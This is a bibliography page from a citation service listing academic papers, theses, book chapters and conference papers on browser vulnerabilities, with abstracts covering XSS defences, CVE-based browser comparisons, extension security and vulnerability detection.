Relevant bibliographies by topics / Browser Vulnerability

Contents

  1. Journal articles
  2. Dissertations / Theses
  3. Book chapters
  4. Conference papers

Academic literature on the topic 'Browser Vulnerability'

Author: Grafiati
Published: 4 June 2025
Last updated: 7 July 2025

Create a spot-on reference in APA, MLA, Chicago, Harvard, and other styles

Select a source type:

Consult the lists of relevant articles, books, theses, conference reports, and other scholarly sources on the topic 'Browser Vulnerability.'

Next to every source in the list of references, there is an 'Add to bibliography' button. Press on it, and we will generate automatically the bibliographic reference to the chosen work in the citation style you need: APA, MLA, Harvard, Chicago, Vancouver, etc.

You can also download the full text of the academic publication as pdf and read online its abstract whenever available in the metadata.

Journal articles on the topic "Browser Vulnerability"

1

Fajar, Abdullah, Setiadi Yazid, ., and . "Web Browser Vulnerabilities and Weakness Descriptive Analysis: Is it Chrome Keep Dominant?" International Journal of Engineering & Technology 7, no. 4.44 (2018): 242. http://dx.doi.org/10.14419/ijet.v7i4.44.26999.

Full text
Abstract:
Web Browser play the important mandatory role in accessing the application through the internet and may carry malicious content to the system hence threatening the system from the attacker. Google Chrome is one of popular browser since released on 2008 as one of product of Chromium Project at Google. Chrome is fourth ranking in Common Vulnerabilities Enumeration website and the first ranking among browser that have most of vulnerabilities reported. This paper describe a Descriptive analysis of weakness and vulnerabilities of Chrome browser. The analysis use comparison approach to other popular browser such as Safari and Firefox. The analysis also use main reference and database from mitre.org which have common weakness enumeration database and scoring system calculation for vulnerability. This work cover responsiveness rate among them regarding weakness and vulnerabilities update duration and severity rate. The validation has performed using Descriptive test regarding weakness and vulnerability behavior. According to Architectural, Development and Research Conceptual weakness reported, the browsers has not significantly indicate the difference except between Chrome and Firefox in research conceptual weakness. The severity of browser vulnerabilities shown by Firefox and the best responsiveness to update browser weakness shown by Chrome, followed by Safari. Using Descriptive analysis, Chrome will keep dominant against the other browser, while Firefox and Safari potentially become unpopular such as Internet Explorer for upcoming time.
APA, Harvard, Vancouver, ISO, and other styles
2

Chalyi, Oleksii, Kęstutis Driaunys, and Vytautas Rudžionis. "Assessing Browser Security: A Detailed Study Based on CVE Metrics." Future Internet 17, no. 3 (2025): 104. https://doi.org/10.3390/fi17030104.

Full text
Abstract:
This study systematically evaluates the vulnerabilities of modern web browsers using developed indices derived from the CVE database, including ICVE, ICVSS, IR and IT. These indices incorporate metrics such as vulnerability severity and risks, along with browser popularity, to enable a balanced comparison of browser security. The results highlight significant differences in browser security: while Google Chrome and Samsung Internet exhibited lower threat indices, Mozilla Firefox demonstrated consistently higher scores, indicating greater exposure to risks. These observations a slightly contradict widespread opinion. The findings emphasize the importance of timely software updates in mitigating vulnerabilities, as many incidents were linked to outdated browser versions. This study also introduces a robust methodology for assessing browser threats, providing a framework for future research. Potential applications include developing browser-based penetration testing systems to simulate phishing and data extraction scenarios, offering insights into user-specific risks and broader organizational impacts. By combining theoretical analysis with practical implications, this work contributes to advancing browser security and lays the foundation for future applied research in cybersecurity.
APA, Harvard, Vancouver, ISO, and other styles
3

Junjie Wang, Xiaohong Li, Bobo Yan, and Zhiyong Feng. "Pointer Analysis Based Vulnerability Detection for Browser Extension." International Journal of Digital Content Technology and its Applications 6, no. 1 (2012): 488–95. http://dx.doi.org/10.4156/jdcta.vol6.issue1.59.

Full text
APA, Harvard, Vancouver, ISO, and other styles
4

Ray, Loye Lynn. "Countering Cross-Site Scripting in Web-based Applications." International Journal of Strategic Information Technology and Applications 6, no. 1 (2015): 57–68. http://dx.doi.org/10.4018/ijsita.2015010105.

Full text
Abstract:
Today's dynamic web-based applications have become a normal and critical asset to an organizations business. They come with an increase in the number of web vulnerabilities and attacks. These weaknesses allow hackers to focus their attention on attacking this important information source. The most common vulnerability is cross-site scripting (XSS) and one of the Open Web Application Security project (OWASP) top ten web-threats. XSS occurs when a Web-based application allows untrusted information be accepted and sent back to a browser. Also they can execute scripts within a browser that can deface web sites, redirect users to malicious content and hijack browsers. One reason for this problem was the lack of developers understanding the causes of XSS. In this paper, the authors address the causes of XSS and countermeasures to defense against these threats.
APA, Harvard, Vancouver, ISO, and other styles
5

Johnston, Reuben, Shahryar Sarkani, Thomas Mazzuchi, Thomas Holzer, and Timothy Eveleigh. "Multivariate models using MCMCBayes for web-browser vulnerability discovery." Reliability Engineering & System Safety 176 (August 2018): 52–61. http://dx.doi.org/10.1016/j.ress.2018.03.024.

Full text
APA, Harvard, Vancouver, ISO, and other styles
6

Priyanka, K., Krishna P. Yuvan, Kumar JS Ajay, J. Dharun, N. Rooban, and N. Vinayagamoorthy. "Web Extension for Recon." Journal of Research and Review: Hacking Techniques and Information Security Systems 1, no. 2 (2025): 11–16. https://doi.org/10.5281/zenodo.15589787.

Full text
Abstract:
<em>This paper presents a browser extension designed to automate fundamental reconnaissance activities directly within the web browser environment. The extension dynamically captures the URL of the currently active webpage and systematically executes a suite of reconnaissance operations, including subdomain enumeration, HTTP header analysis, DNS resolution, port scanning . By integrating these capabilities natively into the browser, the tool enables security researchers and ethical hackers to rapidly access critical reconnaissance insights without reliance on external utilities or complex configurations. Emphasizing usability, efficiency, and automation, this solution transforms routine webpage visits into immediate opportunities for comprehensive vulnerability assessment, significantly simplifying the initial phases of security analysis.</em>
APA, Harvard, Vancouver, ISO, and other styles
7

Johnston, Reuben, Shahryar Sarkani, Thomas Mazzuchi, Thomas Holzer, and Timothy Eveleigh. "Bayesian-model averaging using MCMCBayes for web-browser vulnerability discovery." Reliability Engineering & System Safety 183 (March 2019): 341–59. http://dx.doi.org/10.1016/j.ress.2018.11.030.

Full text
APA, Harvard, Vancouver, ISO, and other styles
8

Darmawan, Candra, Julius Panda Putra Naibaho, and Alex De Kweldju. "Penerapan Metode Vulnerability Assessment untuk Identifikasi Keamanan Website berdasarkan OWASP ID Tahun 2021." Edumatic: Jurnal Pendidikan Informatika 8, no. 1 (2024): 272–81. http://dx.doi.org/10.29408/edumatic.v8i1.25834.

Full text
Abstract:
Universities, as educational institutions, are potential targets of cyber attacks. This is inevitable problem, one of which the University of Papua (UNIPA). The purpose this research is to find the security gaps the UNIPA website based on OWASP ID in 2021 and implement mitigation. Type of research is quantitative research with Vulnerability Assessment and Penetration Testing Life Cycle (VAPT) method. The VAPT method in research goes through five stages, namely scope, information gathering, vulnerability assessment, risk assessment, and reporting. The object of research is UNIPA website. Data collection uses primary data, the results of scanning the Zed Attack Proxy (ZAP) application. Data obtained from alerts ID, alerts, risk, and OWASP ID as information on vulnerability of UNIPA website. Research data analysis using OWASP ID. The results our findings, the vulnerability of UNIPA website is influenced by two factors, website security weaknesses and user negligence. Vulnerabilities with alerts ID A1, A2, A3, A4 A5, and A6 are a group website security weaknesses. The solution, vulnerabilities need utilize special systems such as anti-CSRF, CSP, CDN, Strict-Transport-Security Header, and timestamp checking so that the website is proportional. Meanwhile, the vulnerability with alerts ID A7 is a classification of user negligence. The solution is users must use the latest version of the browser. Browsers with latest version have X-Content-Type-Options: nosniff security mechanism to prevent sniffing attacks.
APA, Harvard, Vancouver, ISO, and other styles
9

Wei, Qiang, Ze Hui Wu, Rong Hua Tao, and Dong Ren. "Authentication Algorithm Based on Hash-Tree for Web Single Sign-On." Applied Mechanics and Materials 490-491 (January 2014): 1368–73. http://dx.doi.org/10.4028/www.scientific.net/amm.490-491.1368.

Full text
Abstract:
During the authentication process of web-based single sign-on system, it is insecure that all authentication messages are forwarded by the browser, and its integrity protection is not comprehensive. This vulnerability can be exploited by attackers to bypass the authentication systems, login any account. In this work we analyze the vulnerability threat model and its root causes in detail, and propose an authentication algorithm based on Hash-tree. This algorithm can not only improve the security of the system, but the processing efficiency of the system is also acceptable according to the simulation results.
APA, Harvard, Vancouver, ISO, and other styles
10

Revyakina, Yelena, Larissa Cherckesova, Olga Safaryan, Denis Korochentsev, Nikolay Boldyrikhin, and Yuri Ivanov. "Possibilities of conducting XSS-attacks and the development of countermeasures." E3S Web of Conferences 224 (2020): 01040. http://dx.doi.org/10.1051/e3sconf/202022401040.

Full text
Abstract:
The article describes the investigation process of the possibilities of XSS–attacks, and the development of counteraction means to these attacks. Researches were determined whether XSS–attack can be fulfilled successfully, and vulnerability detection methods can be applied; were developed the logical and structural diagrams of XSS–vulnerability detection program; were realized program implementation (software) of algorithms for detecting XSS–vulnerabilities on the Web – sites. The software implementation is Web extension for the Google Chrome browser. Main purpose of implementing this software is to confirm or deny the presence of XSS–vulnerabilities on the site, and to counteract the possible attack.
APA, Harvard, Vancouver, ISO, and other styles
More sources

Dissertations / Theses on the topic "Browser Vulnerability"

1

Chi, Tzu-Yen, and 姬子嚴. "Exploit Kit Kill Chain Lab: Automatic website redirect and browser vulnerability exploit." Thesis, 2018. http://ndltd.ncl.edu.tw/handle/49rg5m.

Full text
Abstract:
碩士<br>健行科技大學<br>資訊工程系碩士班<br>106<br>Nowadays, Internet is not only convenient but also dangerous in human''s life. Most of Malware are spread through Exploit Kit which is the most popular way to infect victim on Internet. Exploit Kit also is the most threatening attack that is the Entry point of the Cyber Kill Chain. Today, there are few real Exploit Kit environment and global malicious URLs databases are lack of Exploit Kit information or detection. It is hard to understand and experience how Exploit Kit redirect website and infect victim. Because of that, we make a Exploit Kit simulation platform including network topology to know how Exploit Kit works in this thesis. By setting monitor module to record, we can know the architecture of website redirect and how to exploit browser make victim download and execute Malware when victim browsing Exploit Kit.
APA, Harvard, Vancouver, ISO, and other styles
2

Djeric, Vladan. "Securing Script-based Extensibility in Web Browsers." Thesis, 2009. http://hdl.handle.net/1807/18281.

Full text
Abstract:
Web browsers are increasingly designed to be extensible to keep up with the Web's rapid pace of change. This extensibility is typically implemented using script-based extensions. Script extensions have access to sensitive browser APIs and content from untrusted web pages. Unfortunately, this powerful combination creates the threat of privilege escalation attacks that grant web page scripts the full privileges of script extensions and control over the entire browser process. This thesis describes the pitfalls of script-based extensibility based on our study of the Firefox Web browser, and is the first to offer a classification of script-based privilege escalation vulnerabilities. We propose a taint-based system to track the spread of untrusted data in the browser and to detect the characteristic signatures of privilege escalation attacks. We show that this approach is effective by testing our system against exploits in the Firefox bug database and finding that it detects the vast majority of attacks with no false alarms.
APA, Harvard, Vancouver, ISO, and other styles
3

Shahriar, HOSSAIN. "MITIGATION OF WEB-BASED PROGRAM SECURITY VULNERABILITY EXPLOITATIONS." Thesis, 2011. http://hdl.handle.net/1974/6892.

Full text
Abstract:
Over the last few years, web-based attacks have caused significant harm to users. Many of these attacks occur through the exploitations of common security vulnerabilities in web-based programs. Given that, mitigation of these attacks is extremely crucial to reduce some of the harmful consequences. Web-based applications contain vulnerabilities that can be exploited by attackers at a client-side (browser) without the victim’s (browser user’s) knowledge. This thesis is intended to mitigate some exploitations due to the presence of security vulnerabilities in web applications while performing seemingly benign functionalities at the client-side. For example, visiting a webpage might result in JavaScript code execution (cross-site scripting), downloading a file might lead to the execution of JavaScript code (content sniffing), clicking on a hyperlink might result in sending unwanted legitimate requests to a trusted website (cross-site request forgery), and filling out a seemingly legitimate form may eventually lead to stealing of credential information (phishing). Existing web-based attack detection approaches suffer from several limitations such as (i) modification of both server and client-side environments, (ii) exchange of sensitive information between the server and client, and (iii) lack of detection of some attack types. This thesis addresses these limitations by mitigating four security vulnerabilities in web applications: cross-site scripting, content sniffing, cross-site request forgery, and phishing. We mitigate the exploitations of these vulnerabilities by developing automatic attack detection approaches at both server and client-sides. We develop server-side attack detection frameworks to detect attack symptoms within response pages before sending them to the client. The approaches are designed based on the assumption that the server-side program source is available for analysis, but we are not allowed to alter the program code and the runtime environments. Moreover, we develop client-side attack detection frameworks so that some level of protection is present when the source code of server websites (either trusted or untrusted) is not available. Our proposed solutions explore several techniques such as response page parsing and file content analysis, browser-level checking of requests and responses, and finite state machine-based behavior monitoring. The thesis evaluates the proposed attack detection approaches with real-world vulnerable programs. The evaluation results indicate that our approaches are effective and perform better than the related work. We also contribute to the development of benchmark suites for evaluating attack detection techniques.<br>Thesis (Ph.D, Computing) -- Queen's University, 2011-11-29 09:44:24.465
APA, Harvard, Vancouver, ISO, and other styles

Book chapters on the topic "Browser Vulnerability"

1

Ter Louw, Mike, Jin Soon Lim, and V. N. Venkatakrishnan. "Extensible Web Browser Security." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer Berlin Heidelberg, 2007. http://dx.doi.org/10.1007/978-3-540-73614-1_1.

Full text
APA, Harvard, Vancouver, ISO, and other styles
2

Hausknecht, Daniel, Jonas Magazinius, and Andrei Sabelfeld. "May I? - Content Security Policy Endorsement for Browser Extensions." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2015. http://dx.doi.org/10.1007/978-3-319-20550-2_14.

Full text
APA, Harvard, Vancouver, ISO, and other styles
3

Yen, Ting-Fang, Xin Huang, Fabian Monrose, and Michael K. Reiter. "Browser Fingerprinting from Coarse Traffic Summaries: Techniques and Implications." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer Berlin Heidelberg, 2009. http://dx.doi.org/10.1007/978-3-642-02918-9_10.

Full text
APA, Harvard, Vancouver, ISO, and other styles
4

Chatzoglou, Efstratios, Vyron Kampourakis, Zisis Tsiatsikas, Georgios Karopoulos, and Georgios Kambourakis. "Keep Your Memory Dump Shut: Unveiling Data Leaks in Password Managers." In ICT Systems Security and Privacy Protection. Springer Nature Switzerland, 2024. http://dx.doi.org/10.1007/978-3-031-65175-5_5.

Full text
Abstract:
AbstractPassword management has long been a persistently challenging task. This led to the introduction of password management software, which has been around for at least 25 years in various forms, including desktop and browser-based applications. This work assesses the ability of two dozen password managers, 12 desktop applications, and 12 browser plugins, to effectively protect the confidentiality of secret credentials in six representative scenarios. Our analysis focuses on the period during which a Password Manager (PM) resides in the RAM. Despite the sensitive nature of these applications, our results show that across all scenarios, only three desktop PM applications and two browser plugins do not store plaintext passwords in the system memory. Oddly enough, at the time of writing, only two vendors recognized the exploit as a vulnerability, reserving CVE-2023-23349, while the rest chose to disregard or underrate the issue.
APA, Harvard, Vancouver, ISO, and other styles
5

Durey, Antonin, Pierre Laperdrix, Walter Rudametkin, and Romain Rouvoy. "FP-Redemption: Studying Browser Fingerprinting Adoption for the Sake of Web Security." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2021. http://dx.doi.org/10.1007/978-3-030-80825-9_12.

Full text
APA, Harvard, Vancouver, ISO, and other styles
6

Wang, Qin, Xiaohong Li, and Bobo Yan. "A Browser Extension Vulnerability Detecting Approach Based on Behavior Monitoring and Analysis." In Communications in Computer and Information Science. Springer Berlin Heidelberg, 2012. http://dx.doi.org/10.1007/978-3-642-34447-3_24.

Full text
APA, Harvard, Vancouver, ISO, and other styles
7

Amin Azad, Babak, Oleksii Starov, Pierre Laperdrix, and Nick Nikiforakis. "Short Paper - Taming the Shape Shifter: Detecting Anti-fingerprinting Browsers." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2020. http://dx.doi.org/10.1007/978-3-030-52683-2_8.

Full text
APA, Harvard, Vancouver, ISO, and other styles
8

Laperdrix, Pierre, Gildas Avoine, Benoit Baudry, and Nick Nikiforakis. "Morellian Analysis for Browsers: Making Web Authentication Stronger with Canvas Fingerprinting." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2019. http://dx.doi.org/10.1007/978-3-030-22038-9_3.

Full text
APA, Harvard, Vancouver, ISO, and other styles
9

Egele, Manuel, Peter Wurzinger, Christopher Kruegel, and Engin Kirda. "Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks." In Detection of Intrusions and Malware, and Vulnerability Assessment. Springer Berlin Heidelberg, 2009. http://dx.doi.org/10.1007/978-3-642-02918-9_6.

Full text
APA, Harvard, Vancouver, ISO, and other styles
10

Gupta, Shashank, and B. B. Gupta. "BDS." In Application Development and Design. IGI Global, 2018. http://dx.doi.org/10.4018/978-1-5225-3422-8.ch039.

Full text
Abstract:
Cross-Site Scripting (XSS) attack is a vulnerability on the client-side browser that is caused by the improper sanitization of the user input embedded in the Web pages. Researchers in the past had proposed various types of defensive strategies, vulnerability scanners, etc., but still XSS flaws remains in the Web applications due to inadequate understanding and implementation of various defensive tools and strategies. Therefore, in this chapter, the authors propose a security model called Browser Dependent XSS Sanitizer (BDS) on the client-side Web browser for eliminating the effect of XSS vulnerability. Various earlier client-side solutions degrade the performance on the Web browser side. But in this chapter, the authors use a three-step approach to bypass the XSS attack without degrading much of the user's Web browsing experience. While auditing the experiments, this approach is capable of preventing the XSS attacks on various modern Web browsers.
APA, Harvard, Vancouver, ISO, and other styles

Conference papers on the topic "Browser Vulnerability"

1

Davari, Maryam, and Mohammad Zulkernine. "Analysing vulnerability reproducibility for Firefox browser." In 2016 14th Annual Conference on Privacy, Security and Trust (PST). IEEE, 2016. http://dx.doi.org/10.1109/pst.2016.7906955.

Full text
APA, Harvard, Vancouver, ISO, and other styles
2

Chufeng, Zeng, and Wang Qingxian. "Systematical Vulnerability Detection in Browser Validation Mechanism." In 2011 Seventh International Conference on Computational Intelligence and Security (CIS). IEEE, 2011. http://dx.doi.org/10.1109/cis.2011.188.

Full text
APA, Harvard, Vancouver, ISO, and other styles
3

Liu, Yuan, Wenbing Zhao, Dan Wang, and Lihua Fu. "A XSS Vulnerability Detection Approach Based on Simulating Browser Behavior." In 2015 2nd International Conference on Information Science and Security (ICISS). IEEE, 2015. http://dx.doi.org/10.1109/icissec.2015.7370974.

Full text
APA, Harvard, Vancouver, ISO, and other styles
4

Khan, Nayeem, Johari Abdullah, and Adnan Shahid Khan. "Towards vulnerability prevention model for web browser using interceptor approach." In 2015 9th International Conference on IT in Asia (CITA). IEEE, 2015. http://dx.doi.org/10.1109/cita.2015.7349842.

Full text
APA, Harvard, Vancouver, ISO, and other styles
5

Yu, Jianjia, Song Li, Junmin Zhu, and Yinzhi Cao. "CoCo: Efficient Browser Extension Vulnerability Detection via Coverage-guided, Concurrent Abstract Interpretation." In CCS '23: ACM SIGSAC Conference on Computer and Communications Security. ACM, 2023. http://dx.doi.org/10.1145/3576915.3616584.

Full text
APA, Harvard, Vancouver, ISO, and other styles
6

Turnip, Togu Novriansyah, Hotma Aruan, Anita Lasmaria Siagian, and Leonardo Siagian. "Web Browser Extension Development of Structured Query Language Injection Vulnerability Detection Using Long Short-Term Memory Algorithm." In 2022 IEEE International Conference of Computer Science and Information Technology (ICOSNIKOM). IEEE, 2022. http://dx.doi.org/10.1109/icosnikom56551.2022.10034905.

Full text
APA, Harvard, Vancouver, ISO, and other styles
7

Raunak, M. S., Richard Kuhn, Richard Kogut, and Raghu Kacker. "Vulnerability trends in web servers and browsers." In HotSoS '20: Hot Topics in the Science of Security. ACM, 2020. http://dx.doi.org/10.1145/3384217.3384227.

Full text
APA, Harvard, Vancouver, ISO, and other styles
8

Aldoseri, Abdulla, and David Oswald. "insecure:// Vulnerability Analysis of URI Scheme Handling in Android Mobile Browsers." In Workshop on Measurements, Attacks, and Defenses for the Web. Internet Society, 2022. http://dx.doi.org/10.14722/madweb.2022.23003.

Full text
APA, Harvard, Vancouver, ISO, and other styles
9

Radescu, Radu, and Sever Pasca. "ENHANCING THE SECURITY LEVEL OF THE NEW VERSION OF THE EASY-LEARNING ONLINE PLATFORM." In eLSE 2017. Carol I National Defence University Publishing House, 2017. http://dx.doi.org/10.12753/2066-026x-17-108.

Full text
Abstract:
The Easy-Learning platform is a system of online education developed as an original product of the Department of Applied Electronics and Information Engineering from the University Politehnica of Bucharest. The platform has undergone many changes over the years, from a simple project and becoming a complex and efficient work in virtual learning environment. At this time, the platform has achieved a high degree of maturity, obtained using Symfony's framework, which simplifies many repetitive tasks, enables automatic generation entities and networking with other technologies currently used. To design and implement version 2.0 of the Easy-Learning platform the following technologies were used: PHP5, JavaScript, HTML5, CSS3, MariaDB database management system (compared to MySQL in previous versions), RESTful Web services, Android, Apache (as Web server) and methodologies for securing the communication between an application server and a client application. Due to technology and security issues that arise in older versions of each framework, it was decided rewriting the PHP code of the platform in order to use the Symfony 2 framework. Accessing the interfaces for administrator, tutor and student is a secure action using a user name and password so that access is not allowed to unauthenticated users. On a server running MariaDB multiple users may be defined. For security reasons, the root user should be used only for administrative purposes. For each user to use the system, it must establish an individual account, which corresponds to a user name and password. They must not be identical usernames and passwords outside MariaDB system (for example, user names and passwords for UNIX and NT). Like MySQL, MariaDB has a complex system of privileges. A privilege is the right to perform a particular action on an object and is associated with a particular user. The concept is very similar to permissions on files. When creating users in MariaDB, it is assigned a set of privileges to specify the actions they can perform in the system. JavaScript scripts are limited by severe restrictions imposed by web browsers. For security reasons, JavaScript can not read, write, create and delete files on your hard disk. In terms of security, PHP provide developers a flexible and efficient set of safety measures. Developing of open-source PHP caused its rapid adaptation to the Web needs, and an efficient and secure code. PHP 5.5 (2013) and 5.6 (2014) are stable versions, including solving security issues. Twig is a templating system that supports PHP. Among the advantages of its use it is the security function. Twig has a sandbox mode used to evaluate the code. Twig can be used as a templating language where users are allowed to execute design actions. Among the recent improvements made to the Easy-Learning platform are rewriting PHP code, so that the Symfony 2 framework structure can be used, and securing authentication forms and private sections using an SSL certificate. Symfony 2 allows passwords to be encrypted using different algorithms, such as MD5, SHA1, SHA512 and bcrypt. The bcrypt algorithm is a function of a key derivation for passwords based on the Blowfish cipher. Besides that has defined a leap to protect against a dictionary-based attacks prefilled with different values, it is an adaptive function: in time, the number of iterations can be increased to make it more difficult to decrypt password. The bcrypt encryption algorithm used for passwords in Symfony 2 is presented. Because the platform works with personal data is needed as they are sent to the server through a secure protocol to prevent attacks like Man in the Middle or data theft. To demonstrate the implementation of this requirement, SSL (Secure Sockets Layer) certificates generated on the server development were used. This means that accessing the Easy-Learning platform browser will display a warning message indicating that the SSL certificate was not issued by an authority. The operation of porting the new version of the platform to the production server introduced a valid certificate. Sections that were considered opportune to introduce the HTTPS protocol are: login page, admin interface, tutor interface and student interface. Communication via HTTPS is done using the (public key, private key) pair. Thus, the data entered in the form is encrypted using a public key and sent to server. The server, using the private key, can decrypt and extract the contents of the data sent. The procedures for securing a specific page in Symfony 2 and the entire admin interface are presented. In order to test platform vulnerabilities, Acunetix Web Vulnerability Scanner 8 was used. With this tool, were tested vulnerabilities as: SQL Injection, XSS, Trojan Script, Week_Password_Basic_Auth, CRLF Injection, PHP Code Injection and CSRF. The results obtained by running this toll are presented. The recent contributions to the Easy-Learning platform includes creating a RESTful web service that can be used by external applications to access public and private information, based on a token generated for each student using its authentication service. In perspective, it is intended to add an external caching system such as Varnish.
APA, Harvard, Vancouver, ISO, and other styles
10

Tamanna, Mahzabin, Joseph Stephens, Abdolhossein Sarrafzadeh, and Mohd Anwar. "Exploring User Perspectives on Prioritizing Security through Software Updates." In 15th International Conference on Applied Human Factors and Ergonomics (AHFE 2024). AHFE International, 2024. http://dx.doi.org/10.54941/ahfe1004772.

Full text
Abstract:
Security vulnerabilities can put users at risk if they do not promptly install necessary security updates. To minimize risk, software developers regularly release security updates that address known or potential vulnerabilities. However, previous studies have revealed numerous reasons why users may not adopt software updates. Additionally, the National Vulnerability Database (NVD) demonstrated that not all types of software are equally vulnerable to security breaches. Therefore, this study investigates users' perceptions of software updates while delving into the complex realm of human behavior, uncovering which type of software users prioritize when considering updates. This study also explores to what extent the users trust these software updates.To gain a comprehensive understanding of users' perspectives on software updates, we conducted a survey consisting of questions designed to uncover valuable insights into individual behaviors, attitudes, and preferences related to performing software updates. The questionnaire featured a list of seven categories of software, such as web browsers, multimedia players, and antivirus software. The participants ranked their preferred software categories for security updates. Our survey asked users about their trust in software updates for improving security. We collected user attitudes towards software updates to offer insights to developers, analysts, and users. Out of the 63 volunteers, 48 provided complete responses for us to analyze. The group had a nearly equal split of males and females (54.17% and 45.83%, respectively), with most being between 26 and 34 years old and having a higher level of education. All participants spent at least one hour per day on the computer.Our analysis shows that around 29% of the respondents prioritize antivirus updates when making decisions about which categories of software to update for security. Additionally, approximately one quarter (26%) prioritize updates to the operating system, and approximately one in five respondents identify web browsers as significant for maintaining a secure infrastructure. Notably, only 3.52% of the participants consider multimedia software updates important. We also observed that around half of the respondents (48%) believe that updating software can enhance the security of their system. However, these users do not fully trust on software updates. In contrast, 16% of users rarely or never rely on software updates. Moreover, approximately 40% of users have had negative experiences and were hesitant to apply software updates, which is likely a significant reason for their reluctance to depend on software updates.In conclusion, these findings highlight user preferences and factors that influence their decisions regarding which software categories they prioritize for updates based on security considerations. Users prioritize software that is essential or requires updates to run the system, such as OS updates. Furthermore, many users do not believe that updates can improve security due to past negative experiences. Achieving higher adoption rates of software updates remains an open challenge due to a persistent lack of trust. To improve security through software updates, it is not enough to progress only on the technological front; it is also essential to develop more effective strategies to make the updates reliable and win the trust of users.
APA, Harvard, Vancouver, ISO, and other styles
You might also be interested in the extended bibliographies on the topic 'Browser Vulnerability' for particular source types:
Journal articles
We offer discounts on all premium plans for authors whose works are included in thematic literature selections. Contact us to get a unique promo code!

To the bibliography